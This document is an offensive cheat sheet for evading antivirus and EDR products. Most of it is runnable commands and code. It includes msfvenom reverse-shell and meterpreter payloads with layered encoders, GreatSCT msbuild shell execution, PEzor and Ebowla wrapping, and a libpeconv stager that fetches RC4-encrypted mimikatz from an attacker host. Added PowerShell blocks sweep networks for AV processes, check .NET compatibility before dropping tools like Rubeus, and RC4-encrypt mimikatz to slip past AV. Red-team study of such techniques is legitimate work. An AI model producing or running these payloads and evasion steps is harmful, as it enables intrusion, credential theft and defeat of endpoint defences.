BypassAV Notes and cheat sheet
Some Prominent resources
Recon
Common AV Process Names
- avp.exe: Kaspersky Internet Security (KIS) / Kaspersky Endpoint Security (KES)
- cpda.exe: Check Point Endpoint Security
- egui.exe: ESET GUI
- ekrn.exe: ESET Kernel Service
- MsMpEng.exe: Windows Defender
- ntrtscan.exe: Trend Micro OfficeScan
- tmlisten.exe: Trend Micro OfficeScan
Search for Active AV Processes on Hosts
- Note: Remote WMI/CIM queries require local admin on the target hosts. The root\SecurityCenter2 namespace exists only on client (workstation) editions of Windows, not on Windows Server, and wmic.exe is deprecated and missing on recent Windows 11 builds, so prefer the CIM cmdlet.
Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe","avp.exe","ekrn.exe","ntrtscan.exe"} | select ProcessName,PSComputerName}
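The one-liner above only matches a single process name and has no fallback when a host is unreachable. The following is an added example (not part of the original notes): it sweeps a host list for every process in the table above and also reads the products registered in SecurityCenter2, over DCOM like gwmi so that WinRM is not required. It assumes the caller is a local admin on each target; the host names in $Targets are constructed placeholders.

```powershell
# Process name -> vendor/product (the table above)
$AvProcessMap = @{
    'avp.exe'      = 'Kaspersky Internet Security / Endpoint Security'
    'cpda.exe'     = 'Check Point Endpoint Security'
    'egui.exe'     = 'ESET GUI'
    'ekrn.exe'     = 'ESET Kernel Service'
    'MsMpEng.exe'  = 'Windows Defender'
    'ntrtscan.exe' = 'Trend Micro OfficeScan'
    'tmlisten.exe' = 'Trend Micro OfficeScan'
}

function Find-AvProcess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [string[]] $ComputerName,
        [hashtable] $Map = $AvProcessMap,
        # Dcom takes the same path as gwmi and needs no WinRM listener on the target
        [ValidateSet('Dcom', 'Wsman')] [string] $Protocol = 'Dcom'
    )
    process {
        foreach ($cn in $ComputerName) {
            $session = $null
            try {
                $session = New-CimSession -ComputerName $cn -ErrorAction Stop `
                    -SessionOption (New-CimSessionOption -Protocol $Protocol)

                # 1. Running processes matched against the known AV process names
                Get-CimInstance -CimSession $session -ClassName Win32_Process -ErrorAction Stop |
                    Where-Object { $Map.ContainsKey($_.Name) } |   # @{} keys are case-insensitive
                    ForEach-Object {
                        [pscustomobject]@{
                            ComputerName = $cn
                            Source       = 'Win32_Process'
                            Name         = $_.Name
                            Product      = $Map[$_.Name]
                            Detail       = "PID $($_.ProcessId) $($_.ExecutablePath)"
                        }
                    }

                # 2. Products registered with Security Center (client Windows only; the
                #    namespace does not exist on Windows Server, hence the nested try)
                try {
                    Get-CimInstance -CimSession $session -Namespace root/SecurityCenter2 `
                                    -ClassName AntiVirusProduct -ErrorAction Stop |
                        ForEach-Object {
                            # productState decoding is undocumented but widely used:
                            # hex byte 2 = 10 -> real-time protection on, hex byte 3 = 00 -> signatures current
                            $hex = '{0:x6}' -f [int]$_.productState
                            [pscustomobject]@{
                                ComputerName = $cn
                                Source       = 'SecurityCenter2'
                                Name         = $_.displayName
                                Product      = $_.displayName
                                Detail       = "enabled=$($hex.Substring(2,2) -eq '10') upToDate=$($hex.Substring(4,2) -eq '00')"
                            }
                        }
                } catch {
                    Write-Verbose "${cn}: root/SecurityCenter2 not available (server OS?)"
                }
            } catch {
                Write-Warning "${cn}: $($_.Exception.Message)"
            } finally {
                if ($session) { Remove-CimSession $session }
            }
        }
    }
}

# Constructed placeholder list; in practice: Get-Content .\100-hosts.txt | Find-AvProcess
$Targets = 'WS01', 'WS02'
$Targets | Find-AvProcess | Format-Table -AutoSize
```

Unreachable hosts produce a warning and the sweep continues; pass -Verbose to see which hosts lacked the SecurityCenter2 namespace.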
Identify Microsoft.NET version from inspecting assembly properties:
PS > cd C:\Windows\Microsoft.NET\Framework64\
PS > ls
PS > cd .\v4.0.30319\
PS > Get-Item .\clr.dll | Fl
Or
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion
Identify Microsoft.NET version from querying the registry:
PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release
Windows Build <-> Default .NET Framework Version Associations
- Windows 10 1507: 4.6
- Windows 10 1511: 4.6.1
- Windows 10 1607: 4.6.2
- Windows 10 1703: 4.7
- Windows 10 1709: 4.7.1
- Windows 10 1803: 4.7.2
- Windows 10 1809: 4.7.2
- Windows 10 1903 and later: 4.8
- Windows 11 21H2: 4.8
- Windows 11 22H2 and later: 4.8.1
.NET Framework Version <-> CLR Version Associations
- .NET Framework 2.0, 3.0, 3.5: CLR v2
- .NET Framework 4, 4.5 through 4.8.1: CLR v4
Note: You don't have to target the exact .NET Framework version when compiling your tools; matching the CLR major version from the table above is enough. All 4.x Framework releases are in-place updates that run on CLR v4, so Rubeus compiled for .NET 4.5 loads on a host that only has .NET 4.0, as long as it does not call APIs introduced after 4.0. This does not hold across CLR generations: an assembly built for CLR v4 will not load on a host that has only .NET 3.5 (CLR v2).
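The checks above (registry Release value, clr.dll version, CLR generation of the tool) can be combined into one pre-flight test. The following is an added example, not from the original notes: it maps the Release DWORD to a Framework version using Microsoft's published detection minimums, reads the runtime version and TargetFramework string straight out of the assembly's metadata without loading it, and reports whether the tool will load on this host. The tool path at the bottom is a placeholder.

```powershell
# Minimum Release DWORD -> .NET Framework version, highest first
$ReleaseTable = [ordered]@{
    533320 = '4.8.1'; 528040 = '4.8';   461808 = '4.7.2'; 461308 = '4.7.1'
    460798 = '4.7';   394802 = '4.6.2'; 394254 = '4.6.1'; 393295 = '4.6'
    379893 = '4.5.2'; 378675 = '4.5.1'; 378389 = '4.5'
}

function Get-InstalledDotNet {
    $ndp = 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP'
    $v4  = Get-ItemProperty "$ndp\v4\Full" -ErrorAction SilentlyContinue
    if ($v4) {
        $fx = '4.0'                          # plain 4.0 has no Release value at all
        if ($v4.Release) {
            foreach ($min in $ReleaseTable.Keys) {
                if ($v4.Release -ge $min) { $fx = $ReleaseTable[$min]; break }
            }
        }
        return [pscustomobject]@{ ClrMajor = 4; Framework = $fx; Release = $v4.Release }
    }
    $v35 = Get-ItemProperty "$ndp\v3.5" -ErrorAction SilentlyContinue
    if ($v35 -and $v35.Install -eq 1) {
        return [pscustomobject]@{ ClrMajor = 2; Framework = '3.5'; Release = $null }
    }
    [pscustomobject]@{ ClrMajor = $null; Framework = 'none'; Release = $null }
}

function Get-AssemblyRuntime {
    param([Parameter(Mandatory)][string]$Path)
    # Loader-free metadata scan: the metadata root stores the runtime version as an
    # ASCII string ("v4.0.30319" or "v2.0.50727") and TargetFrameworkAttribute's argument
    # sits as a UTF-8 string in the #Blob heap, so a regex over the raw bytes finds both
    # without loading (or executing) anything. Crude, but good enough for triage.
    $bytes = [System.IO.File]::ReadAllBytes((Resolve-Path $Path).Path)
    $text  = [System.Text.Encoding]::GetEncoding('ISO-8859-1').GetString($bytes)
    $rt    = [regex]::Match($text, 'v[24]\.0\.\d{5}').Value
    $tfm   = [regex]::Match($text, '\.NET(Framework|CoreApp),Version=v\d+\.\d+(\.\d)?').Value
    [pscustomobject]@{
        Assembly = Split-Path $Path -Leaf
        Runtime  = $rt
        ClrMajor = $(if ($rt) { [int]$rt.Substring(1, 1) } else { $null })
        Target   = $tfm
    }
}

function Test-DotNetToolCompat {
    param([Parameter(Mandatory)][string]$Path)
    $installed = Get-InstalledDotNet
    $asm       = Get-AssemblyRuntime -Path $Path
    $verdict =
        if (-not $asm.ClrMajor)               { 'no CLR metadata found, not a managed assembly' }
        elseif ($asm.Target -match 'CoreApp') { 'targets .NET (Core); needs that runtime, not the Framework CLR' }
        elseif ($asm.ClrMajor -ne $installed.ClrMajor) { "needs CLR v$($asm.ClrMajor), host has CLR v$($installed.ClrMajor)" }
        elseif ($installed.Framework -match '^\d' -and
                $asm.Target -match 'v(\d+\.\d+(\.\d)?)$' -and
                [version]$Matches[1] -gt [version]$installed.Framework) {
            "loads on CLR v4, but targets .NET $($Matches[1]) on a $($installed.Framework) host: APIs newer than the host will throw"
        }
        else { 'will load' }
    [pscustomobject]@{
        Assembly        = $asm.Assembly
        AssemblyRuntime = $asm.Runtime
        AssemblyTarget  = $asm.Target
        HostCLR         = $installed.ClrMajor
        HostFramework   = $installed.Framework
        Verdict         = $verdict
    }
}

# Placeholder path; run it against the tool you are about to drop on the host
Test-DotNetToolCompat -Path .\Rubeus.exe | Format-List
```

On Windows PowerShell 5.1 the runtime string can also be read with [Reflection.Assembly]::ReflectionOnlyLoadFrom($path).ImageRuntimeVersion, but that API is not available on PowerShell 7, which is why the example scans the file instead.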
Attacking EDRs
EDRPrison
WinDivert
.NET
Python
EDR Blindspots
Bring Your Own Interpreter (BYOI)
Python
BOFs with Python
Python RDI
PE Obfuscation
OLLVM
Note: The following Alpine-based build installs the LLVM 13.x obfuscator from heroims/obfuscator and the wclang cross-compile wrapper from tpoechtrager/wclang. It is written for a container image, which is why the source trees are deleted at the end.
apk update
apk add --no-cache build-base cmake git python3 mingw-w64-gcc
rm -rf /var/cache/apk/*
git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm
cd /opt/ollvm
wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch
patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm
sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt
sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=$(realpath ../clang)|g" CMakeCache.txt
make -j7
make install
git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang
cd /opt/wclang
cmake .
make -j7
make install
rm -rf /opt/ollvm /opt/wclang && mkdir /build
String Encryption
Tools
PowerShell Tactics
PowerShell Obfuscation
Invoke-Obfuscation
Out-EncryptedScript.ps1
PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1
PS > . .\evil.ps1
PS > $dec = de "Passw0rd!" s4lt
PS > Invoke-Expression $dec
PowerShellArmoury
PS > git clone https://github.com/cfalta/PowerShellArmoury
PS > cd PowerShellArmoury
PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json
PS > . .\New-PSArmoury.ps1
PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
PS > cat -raw .\armored.ps1 | iex
Tools
msfvenom
$ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe
Veil-Evasion
$ wine hyperion.exe input.exe output.exe
$ wine PEScrambler.exe -i input.exe -o output.exe
GreatSCT
GreatSCT GitHub Repository
Install and generate a payload:
$ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT
$ cd ~/tools/GreatSCT/setup
$ ./setup.sh
$ cd .. && ./GreatSCT.py
...generate a payload...
$ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml}
$ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
Exec with msbuild.exe and get a shell:
PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml
Ebowla
$ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla
$ sudo apt install golang mingw-w64 wine python-dev -y
$ sudo python -m pip install configobj pyparsing pycrypto pyinstaller
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe
$ vi genetic.config
...Edit output_type, payload_type, clean_output, [[ENV_VAR]]...
$ python ebowla.py rev.exe genetic.config && rm rev.exe
$ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go
[+] output/ebowla-rev.exe
PEzor
PEzor GitHub Repository
Wrap executable into PEzor:
$ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2
inceptor
ScareCrow
Huan
MeterPwrShell
$ sudo ./MeterPwrShell2Kalix64 -c noaptupdate
stager_libpeconv
- stager_libpeconv GitHub Repository
- libpeconv GitHub Repository
$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K $(echo -n '1234567890123456' | xxd -p) -nosalt -out mimikatz.rc4
- Note: On OpenSSL 3.x RC4 lives in the legacy provider, so add -provider legacy -provider default to the command above or it fails with an unsupported-cipher error.
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > dist\stager.exe
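The openssl step above is the only part of the workflow that needs a Linux box. As an added example (not from stager_libpeconv or the original notes), the same RC4 transform in PowerShell lets you prepare mimikatz.rc4 on Windows; it verifies itself against the standard RC4 test vector first. The key and file names mirror the make and server commands above and are placeholders.

```powershell
function Invoke-RC4 {
    param(
        [Parameter(Mandatory)] [byte[]] $Key,
        [Parameter(Mandatory)] [byte[]] $Data
    )
    # Key-scheduling algorithm
    $S = [byte[]](0..255)
    $j = 0
    for ($i = 0; $i -lt 256; $i++) {
        $j = ($j + $S[$i] + $Key[$i % $Key.Length]) -band 0xFF
        $S[$i], $S[$j] = $S[$j], $S[$i]
    }
    # Pseudo-random generation, XORed over the data (encrypt and decrypt are identical)
    $out = [byte[]]::new($Data.Length)
    $i = 0; $j = 0
    for ($n = 0; $n -lt $Data.Length; $n++) {
        $i = ($i + 1) -band 0xFF
        $j = ($j + $S[$i]) -band 0xFF
        $S[$i], $S[$j] = $S[$j], $S[$i]
        $out[$n] = $Data[$n] -bxor $S[($S[$i] + $S[$j]) -band 0xFF]
    }
    return ,$out
}

# Known-answer check: RC4 with key "Key" over "Plaintext" must give BBF316E8D940AF0AD3
$kat = Invoke-RC4 -Key ([Text.Encoding]::ASCII.GetBytes('Key')) `
                  -Data ([Text.Encoding]::ASCII.GetBytes('Plaintext'))
if ((($kat | ForEach-Object { '{0:X2}' -f $_ }) -join '') -ne 'BBF316E8D940AF0AD3') {
    throw 'RC4 self-test failed'
}

# Encrypt the implant with the same ASCII key passed as RC4_KEY to make
$key   = [Text.Encoding]::ASCII.GetBytes('1234567890123456')
$plain = [IO.File]::ReadAllBytes((Join-Path $PWD 'mimikatz.exe'))
[IO.File]::WriteAllBytes((Join-Path $PWD 'mimikatz.rc4'), (Invoke-RC4 -Key $key -Data $plain))
```

The output is byte-for-byte what openssl enc -rc4 -K <hex key> -nosalt produces, so the resulting file can be served by socket_binary_server.py unchanged; remember that RC4 here is only an AV-evasion wrapper for the payload in transit, not a confidentiality control.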